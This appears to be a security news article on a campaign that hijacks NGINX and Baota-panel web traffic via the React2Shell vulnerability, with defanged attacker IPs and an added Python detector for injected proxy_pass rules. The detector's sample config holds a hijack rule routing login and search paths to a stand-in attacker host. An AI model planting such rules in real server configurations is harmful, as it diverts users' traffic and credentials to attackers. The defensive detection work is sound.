Cybersecurity researchers have uncovered an active web traffic hijacking campaign that is compromising NGINX installations and popular management panels such as Baota (BT). The attack redirects legitimate user traffic through infrastructure controlled by threat actors, raising significant concerns for web security. Datadog Security Labs identified that the actors are leveraging the recent React2Shell vulnerability (CVE-2025-55182), which carries a critical CVSS score of 10.0, to deploy their campaign.
The campaign, observed by Datadog Security Labs, specifically targets Asian Top-Level Domains (TLDs) such as .in, .id, .pe, .bd, and .th. It also targets Chinese hosting infrastructure, specifically the Baota Panel, a widely used web server management tool. Government and educational TLDs, including .edu and .gov, have also been identified as targets, indicating a broad scope of interest for the attackers.
NGINX Web Traffic Hijacking Campaign Details
The attackers inject malicious NGINX configuration through shell scripts. These scripts manipulate NGINX, a popular open-source web server, reverse proxy, and load balancer. The core of the attack lies in custom “location” directives added to the NGINX configuration. These directives intercept incoming user requests for specific URL paths; the intercepted traffic is then rerouted to attacker-controlled domains via the “proxy_pass” directive, effectively hijacking the user’s connection.
These malicious scripts are part of a larger, multi-stage toolkit. This toolkit is designed to ensure persistence within compromised systems and to facilitate the creation of the malicious configuration files. Components of this toolkit include several distinct shell scripts, each with a specific role in the attack chain. One script, ‘zx.sh’, acts as the orchestrator, initiating the execution of subsequent stages by utilizing legitimate utilities like ‘curl’ or ‘wget.’ If these programs are blocked, it resorts to establishing a raw TCP connection to send HTTP requests.
Another script, ‘bt.sh’, is specifically designed to target the Baota (BT) Management Panel environment. Its function is to overwrite existing NGINX configuration files with malicious ones. Complementing this is ‘4zdh.sh,’ which automates the discovery of common NGINX configuration file locations and attempts to minimize errors during the creation of new, malicious configurations. A more narrowly focused script, ‘zdh.sh,’ concentrates on NGINX configurations within Linux or containerized environments and specifically targets TLDs like .in and .id.
Finally, the ‘ok.sh’ script serves a reporting function, generating a log of all the actively implemented NGINX traffic hijacking rules within the compromised system. The collective purpose of this toolkit is to enable the threat actors to gain control over web traffic flow and potentially exfiltrate sensitive data or redirect users to malicious sites.
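A defender-side check for the injected “location”/“proxy_pass” pattern described above (the same rules the toolkit’s ‘ok.sh’ logs for the attacker), written here as an added example and not code from the Datadog report or from the campaign: it parses NGINX configuration text, walks each location block, and reports every proxy_pass whose upstream host is outside a local allowlist. The allowlist and the sample configuration are assumptions constructed for this example.

```python
import re
from urllib.parse import urlparse

# Upstream hosts a proxy_pass may legitimately target (assumption: tune per site).
ALLOWED_UPSTREAMS = {"127.0.0.1", "localhost", "backend", "app_pool"}

LOCATION_RE = re.compile(r"\blocation\s+([^{]+?)\s*\{")
PROXY_PASS_RE = re.compile(r"\bproxy_pass\s+([^;\s]+)\s*;")

def _block_end(text, start):
    """Index of the '}' closing the block whose '{' sits just before start.
    Brace-counts only; a brace inside a comment or regex would confuse it."""
    depth, i = 1, start
    while i < len(text) and depth:
        depth += {"{": 1, "}": -1}.get(text[i], 0)
        i += 1
    return i - 1

def _upstream_host(target):
    # 'http://host:port/path' vs bare 'host:port' or an upstream group name
    return urlparse(target).hostname if "://" in target else target.split(":")[0]

def find_suspicious_proxies(config_text, allowed=ALLOWED_UPSTREAMS):
    """Return [(location_match, upstream_host)] in file order for every
    proxy_pass whose host is not allowlisted; nested locations count once."""
    hits = {}  # absolute offset of the proxy_pass -> (location, host)
    for loc in LOCATION_RE.finditer(config_text):
        body_start = loc.end()
        body = config_text[body_start:_block_end(config_text, body_start)]
        for pp in PROXY_PASS_RE.finditer(body):
            host = _upstream_host(pp.group(1))
            if host not in allowed:  # innermost location wins (later match)
                hits[body_start + pp.start()] = (loc.group(1).strip(), host)
    return [hits[k] for k in sorted(hits)]

# Constructed sample: one legitimate local proxy, one injected hijack rule.
SAMPLE_CONFIG = """
server {
    listen 80;
    server_name example.in;
    location /api/ {
        proxy_pass http://127.0.0.1:8080/;
    }
    location ~ ^/(login|search) {
        proxy_set_header Host $host;
        proxy_pass http://attacker-controlled.example/;
    }
}
"""
```

Run `find_suspicious_proxies` over each file under your NGINX conf.d, sites-enabled and panel vhost directories; a non-empty result for a path you did not configure is the hijack rule to investigate.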
Exploitation Activity and Threat Actor Motives
The disclosure of this campaign comes at a time when exploitation attempts for the React2Shell vulnerability are notably high. GreyNoise, a cybersecurity firm, has reported that two specific IP addresses, 193.142.147[.]209 and 87.121.84[.]24, are responsible for a significant 56% of all observed exploitation attempts. These attacks surged approximately two months after the React2Shell vulnerability was publicly disclosed.
Between January 26 and February 2, 2026, researchers identified a total of 1,083 unique source IP addresses participating in React2Shell exploitation. GreyNoise further noted that the dominant sources deploy distinct post-exploitation payloads. One payload is observed to download cryptomining binaries from staging servers, while another establishes direct reverse shells to the scanner IP. This suggests that the threat actors are interested in interactive access to compromised systems, rather than solely relying on automated resource extraction, which could indicate more advanced or targeted operations.
This ongoing activity follows closely on the heels of another cybersecurity incident. Researchers recently uncovered a coordinated reconnaissance campaign targeting Citrix ADC Gateway and NetScaler Gateway infrastructure. This campaign utilized tens of thousands of residential proxies and a single Microsoft Azure IP address (“52.139.3[.]76”) to identify login panels. GreyNoise highlighted that this campaign operated in two distinct modes: a large-scale distributed operation for discovering login panels using proxy rotation, and a more concentrated effort hosted on AWS for enumerating the versions of identified gateways.
The complementary objectives of finding login panels and enumerating their versions point towards a well-coordinated reconnaissance effort, potentially in preparation for further exploitation or widespread compromise. The consistent targeting of robust web infrastructure, such as NGINX and gateway solutions, by various threat actors underscores the persistent need for vigilance and robust security practices in the digital landscape.
Looking ahead, organizations utilizing NGINX installations and management panels like Baota are strongly advised to review their configurations and apply any available security patches immediately to mitigate the risk of web traffic hijacking. The ongoing nature of these attacks suggests that threat actors will likely continue to refine their methods, making proactive security measures and continuous monitoring essential.

